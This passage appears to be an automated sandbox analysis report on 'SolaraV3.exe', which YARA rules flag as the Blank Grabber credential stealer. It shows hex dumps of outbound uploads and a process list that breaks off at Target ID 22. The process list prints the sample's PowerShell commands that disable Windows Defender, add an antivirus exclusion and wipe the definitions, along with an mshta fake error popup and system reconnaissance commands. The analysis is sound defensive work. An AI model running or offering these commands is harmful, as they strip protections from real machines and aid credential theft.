                                                                                                                                                                                                                            2024-10-04 13:33:02 UTC16384OUTData Raw: f9 11 bc 1f d8 e7 d2 f5 14 f7 fa 0e dc 2e 81 23 d1 00 1c c1 9d af e8 aa be 16 94 62 98 d6 37 a0 b9 0c be a1 51 3a b4 6b 04 c6 28 12 01 4f 35 0d be 7b 78 f3 f9 77 6c 46 ea 6f dd 33 0d 8f cb 6d 88 c8 32 60 7c 43 8e 52 48 06 ce 54 ea 7b 75 85 3c f4 d5 51 2c 49 e2 e3 0c c4 92 a2 f5 86 f7 30 ef 16 85 94 dc 4b 4e 9d c2 9d 7a 91 81 cf 26 45 05 90 bc f7 85 86 cd ed f3 ca aa 10 05 e2 9b 63 83 36 2e ec ae 77 15 10 c8 64 ab 67 6e d9 a0 e3 c9 42 cf fb 86 ea 6a a8 ae 76 dd 4d 78 c6 e2 f2 39 c0 c2 90 03 2b 91 a1 1a 89 9f 04 7f 35 64 4e d9 bc 92 a7 fa 2c 7f 20 1d bb 89 a4 94 5a 9c 88 fa f4 b2 9c 70 71 eb 44 f3 00 87 bc 07 3b cb bc d8 df 9b 69 de 83 50 6b 17 5d 29 03 2c 50 58 ec 04 17 04 5f 20 eb e4 fe 40 9e 7b db 4f 47 9a bd dd 1b 3e 4a 49 6c 5f 57 41 b1 a9 2c 2e 84 3a
                                                                                                                                                                                                                            Data Ascii: .#b7Q:k(O5{xwlFo3m2`|CRHT{u<Q,I0KNz&Ec6.wdgnBjvMx9+5dN, ZpqD;iPk]),PX_ @{OG>JIl_WA,.:
                                                                                                                                                                                                                            2024-10-04 13:33:02 UTC16384OUTData Raw: a7 1a ff db 6f 6b 30 ad dd ea ea 5f 26 91 ba 80 74 30 cf 4d 86 dd d1 7c 7a 26 75 36 2f 4c be b9 61 e6 0c ca 48 e0 1b 9f c1 91 ba 5c 40 73 15 59 a1 01 1c f0 c3 a9 fb b5 3b a2 b1 f6 3d d9 bf 54 da 3e 6d 8c 8e 82 ad d7 65 e6 4c c0 14 67 a6 5b dc 59 29 83 5a 50 91 1b 8b e4 e6 27 41 8b 6d ff 0c 8d fd 4b c9 08 ee 80 94 d8 ba 75 d7 dd f1 86 80 c3 c7 f4 15 bd 4f 23 f7 af ec 63 6c 04 bd d8 2a 2f 93 42 f4 10 10 4d a1 0b 79 95 6c 09 fa 32 2f 1a b5 cc be e5 1f ed 3b 44 b6 4a 47 66 4b 79 11 9a 93 dc 6b 89 81 42 0b a1 5f f6 d3 b5 5a b4 e6 0a 6e 57 16 f4 81 40 e9 ab 32 e2 5b 25 f6 63 9f 57 52 17 cb c5 00 c5 47 ed c9 74 c5 a9 bb 20 5a 22 40 00 8c e6 8b dd b9 97 c1 db af d0 54 07 9b be 16 2b 25 77 bc e6 6b fd fd 32 43 71 92 4c cb 11 d6 d7 e7 c7 15 3b 7d 6e 1a 01 1b 4e d9
                                                                                                                                                                                                                            Data Ascii: ok0_&t0M|z&u6/LaH\@sY;=T>meLg[Y)ZP'AmKuO#cl*/BMyl2/;DJGfKykB_ZnW@2[%cWRGt Z"@T+%wk2CqL;}nN
                                                                                                                                                                                                                            2024-10-04 13:33:02 UTC16384OUTData Raw: 07 b9 86 1b 52 15 83 4d fc 07 92 fc 89 2f 1c 51 4f dc e0 c7 0a 72 6c 29 60 13 2b 82 f0 e4 a4 d5 e6 5f 2b 01 13 27 8d e1 01 6d f4 8a 61 94 5d b9 5e 30 08 2c 4b 85 c0 cd 9f 16 1b 59 3d 1a 14 60 07 97 6c 5a aa c2 6c ba 1b 49 80 25 54 2a 6e de 02 f3 90 f5 6e ce a9 65 25 57 52 f1 9b d2 80 26 05 f7 7f 22 ae a6 a3 76 57 39 a5 be 4c b1 33 e3 8e 9d 21 31 34 18 99 30 00 14 46 16 e9 ad d5 67 b4 c2 37 64 6b fd 40 77 92 83 e4 37 18 f6 99 89 5d 9e 0e ad 65 a0 98 1a f9 b6 d9 68 2f 5f eb d4 28 92 e3 41 a0 44 66 79 f7 c3 28 a9 3b 9b 09 54 01 2f e1 6b f2 97 07 ce 18 84 fb bb ed 82 86 63 14 2c 75 3b 0a 12 b6 3c 8f 08 9c 22 ab 5d 6a 17 10 d6 c4 bb 69 90 26 57 3e d8 c7 cd 60 1b 5d 61 30 10 fd e5 eb e2 fa 07 67 aa 29 b8 88 8d 9b 0e f1 19 fe d2 7a 07 86 b5 75 7d 54 13 ed 97 0f
                                                                                                                                                                                                                            Data Ascii: RM/QOrl)`+_+'ma]^0,KY=`lZlI%T*nne%WR&"vW9L3!140Fg7dk@w7]eh/_(ADfy(;T/kc,u;<"]ji&W>`]a0g)zu}T
                                                                                                                                                                                                                            2024-10-04 13:33:02 UTC16384OUTData Raw: a4 00 d4 4a 43 a2 c7 56 90 b2 9a 41 ba c1 71 66 a7 82 57 09 ab 25 e0 f9 c2 d7 23 07 94 27 08 58 7f 66 d1 50 85 ec 97 ef 72 1f a6 04 60 69 9e e1 b0 ae 76 93 cc e9 0d 44 28 b8 bb 0d 7c c6 7f 89 52 9f 0e 67 fa 1b 6e f0 34 11 e7 d5 cf 8e 4a ef 17 6b 50 e2 53 8f e0 63 6d 72 0d 48 e5 a3 5b ea cf bf 4a e9 64 9b 3a ae 3a 3d a4 9f 07 a6 4b ae 1c 04 46 75 16 cf 63 80 af 2b a0 0f 8d c5 bc 0b 33 1d a8 8a 30 0b 1b 2d 52 11 b2 39 88 9a e0 dc e6 81 5c 02 70 45 47 37 da 62 64 88 e0 59 9e 3a 7f c3 05 11 23 48 1e c7 10 e4 41 4d e0 9e 1c e2 8e d4 e3 69 60 f2 60 ef 9c 0b bf 86 eb d2 ca 46 a9 04 96 11 d4 5b 59 21 e5 22 44 99 6f 2b 0a a5 8f 33 64 dc f6 52 69 2a dd a7 73 86 ad f2 d4 31 60 c2 f2 b0 17 43 50 56 fe 61 4e 32 ce 4d 0a 3d 71 59 63 a4 11 f2 61 8a 08 68 b5 9f 4d 90 61
                                                                                                                                                                                                                            Data Ascii: JCVAqfW%#'XfPr`ivD(|Rgn4JkPScmrH[Jd::=KFuc+30-R9\pEG7bdY:#HAMi``F[Y!"Do+3dRi*s1`CPVaN2M=qYcahMa
                                                                                                                                                                                                                            2024-10-04 13:33:02 UTC16384OUTData Raw: 35 d4 14 53 26 fc 48 63 22 93 b8 6f f3 4b 21 92 2d e7 77 99 74 5e a1 24 21 8d d1 eb ae 54 2a b7 32 1e f4 2a f7 cc f5 e7 9f 36 cf e2 b5 fa 45 51 84 e0 06 4b a7 df 26 51 82 57 4b 84 ee fd da 5e 09 49 a3 96 d1 f6 65 00 df 1d 60 4d 8e 99 4c fc 90 6e 97 af 52 e0 78 7b 3a 3c e4 9d 44 7e 96 11 79 fb b7 b2 a0 0d ba f7 32 54 d2 83 70 d7 23 c8 65 11 f3 c3 ea 29 98 d3 4f ff 67 c4 1c 3d dc b1 50 c8 41 47 50 13 ad 86 b5 42 a5 c2 7b d6 bd 58 be 09 1e 26 40 ef e7 49 fd 82 57 8d df 95 bc 9c 43 a8 40 b5 5c 30 5a 89 25 4d 6b 93 53 6e c1 eb d7 8c 17 54 e1 e6 6d 48 d2 46 41 69 c0 be 19 5b 6b c4 cc 71 48 4d fd e9 eb de 35 23 38 7d 28 6b c0 99 d3 47 48 4b 9e 6d b6 50 a8 43 4e 14 56 11 17 ad c2 9d 71 6a 3b cd ed e2 76 f7 d5 e9 2b c2 43 fd 3e a4 df f3 51 5d 42 d8 29 12 99 2a 9c
                                                                                                                                                                                                                            Data Ascii: 5S&Hc"oK!-wt^$!T*2*6EQK&QWK^Ie`MLnRx{:<D~y2Tp#e)Og=PAGPB{X&@IWC@\0Z%MkSnTmHFAi[kqHM5#8}(kGHKmPCNVqj;v+C>Q]B)*
                                                                                                                                                                                                                            2024-10-04 13:33:02 UTC16384OUTData Raw: 09 80 c9 4b 2d 26 ca 3e d8 42 8f a1 92 ff e1 31 e9 4b fc fc 30 35 bd 5d 48 d2 b4 69 25 1b bf b3 f2 51 c8 14 96 19 a8 f0 82 62 6b 72 18 40 29 ea 06 f4 ae 60 12 43 13 da dc d3 c4 65 1f 34 4f 23 27 34 9a 66 42 c1 de a1 74 34 6a 0f 33 a6 50 a6 e8 c6 8a 46 a1 85 89 24 43 0b 51 6e 63 bb ad 8d 41 8a 27 d1 f7 b9 45 e9 b9 f6 d0 fc 80 d8 f0 c9 e5 f6 bd 3e fe 3b ee e8 da a8 bb 09 f2 48 c5 1c 5c 1d f2 cb 0e 9a 88 9c 5d ef e3 6c 71 df 6c bc 40 8b 90 18 68 46 00 e2 3a 51 1b a1 fd 1d 93 f0 79 69 94 3c d3 d7 81 5c ba e7 81 d2 29 9b 98 04 a8 12 78 4a 32 1a d3 21 94 43 39 c3 1a 16 2e 6c 94 17 6c f5 b5 82 41 d3 01 a0 2f 27 d1 80 04 92 3c ad 15 8a d5 dc 04 ab eb 42 fe e3 7d fd 6f ff d4 75 29 15 8c 3c df 2f 26 88 36 0e c8 b1 9c 15 ce 9a 4c a3 e8 2a 6b af f9 b4 fd 73 77 dd 3d
                                                                                                                                                                                                                            Data Ascii: K-&>B1K05]Hi%Qbkr@)`Ce4O#'4fBt4j3PF$CQncA'E>;H\]lql@hF:Qyi<\)xJ2!C9.llA/'<B}ou)</&6L*ksw=
                                                                                                                                                                                                                            2024-10-04 13:33:04 UTC389INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                                                                                                            Date: Fri, 04 Oct 2024 13:33:04 GMT
                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                            Content-Length: 1708
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                            Target ID:1
                                                                                                                                                                                                                            Start time:09:32:16
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\SolaraV3.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\SolaraV3.exe"
                                                                                                                                                                                                                            Imagebase:0x7ff6dc700000
                                                                                                                                                                                                                            File size:6'315'120 bytes
                                                                                                                                                                                                                            MD5 hash:7DD77A8611B56C1ED090293E3AB40F08
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1563577276.000001EA23124000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1563577276.000001EA23122000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:2
                                                                                                                                                                                                                            Start time:09:32:16
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\SolaraV3.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\SolaraV3.exe"
                                                                                                                                                                                                                            Imagebase:0x7ff6dc700000
                                                                                                                                                                                                                            File size:6'315'120 bytes
                                                                                                                                                                                                                            MD5 hash:7DD77A8611B56C1ED090293E3AB40F08
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.1578431253.000001FC253C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000002.2037278592.000001FC22CD0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.2034413215.000001FC25CB1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                                                            Start time:09:32:18
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'"
                                                                                                                                                                                                                            Imagebase:0x7ff680120000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:4
                                                                                                                                                                                                                            Start time:09:32:18
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                                                                                                                                                                            Imagebase:0x7ff680120000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:5
                                                                                                                                                                                                                            Start time:09:32:18
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:6
                                                                                                                                                                                                                            Start time:09:32:18
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('?????? ?????? ???? ????????. ?????? ??? ?????????? ????? ?????? ? ?????? ?????!', 0, 'Error!', 32+16);close()""
                                                                                                                                                                                                                            Imagebase:0x7ff680120000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:7
                                                                                                                                                                                                                            Start time:09:32:18
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:8
                                                                                                                                                                                                                            Start time:09:32:18
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:9
                                                                                                                                                                                                                            Start time:09:32:18
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                            Imagebase:0x7ff680120000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:10
                                                                                                                                                                                                                            Start time:09:32:18
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:11
                                                                                                                                                                                                                            Start time:09:32:18
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                            Imagebase:0x7ff680120000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:12
                                                                                                                                                                                                                            Start time:09:32:18
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:13
                                                                                                                                                                                                                            Start time:09:32:18
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('?????? ?????? ???? ????????. ?????? ??? ?????????? ????? ?????? ? ?????? ?????!', 0, 'Error!', 32+16);close()"
                                                                                                                                                                                                                            Imagebase:0x7ff6cf300000
                                                                                                                                                                                                                            File size:14'848 bytes
                                                                                                                                                                                                                            MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:14
                                                                                                                                                                                                                            Start time:09:32:18
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                                                                                                                                            Imagebase:0x7ff741d30000
                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:15
                                                                                                                                                                                                                            Start time:09:32:18
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'
                                                                                                                                                                                                                            Imagebase:0x7ff741d30000
                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:16
                                                                                                                                                                                                                            Start time:09:32:18
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                            Imagebase:0x7ff6da5b0000
                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:17
                                                                                                                                                                                                                            Start time:09:32:18
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:tasklist /FO LIST
                                                                                                                                                                                                                            Imagebase:0x7ff623ef0000
                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:18
                                                                                                                                                                                                                            Start time:09:32:21
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
                                                                                                                                                                                                                            Imagebase:0x7ff680120000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:19
                                                                                                                                                                                                                            Start time:09:32:21
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff75da10000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:20
                                                                                                                                                                                                                            Start time:09:32:22
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
                                                                                                                                                                                                                            Imagebase:0x7ff768620000
                                                                                                                                                                                                                            File size:77'312 bytes
                                                                                                                                                                                                                            MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:21
                                                                                                                                                                                                                            Start time:09:32:22
                                                                                                                                                                                                                            Start date:04/10/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
                                                                                                                                                                                                                            Imagebase:0x7ff680120000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:22
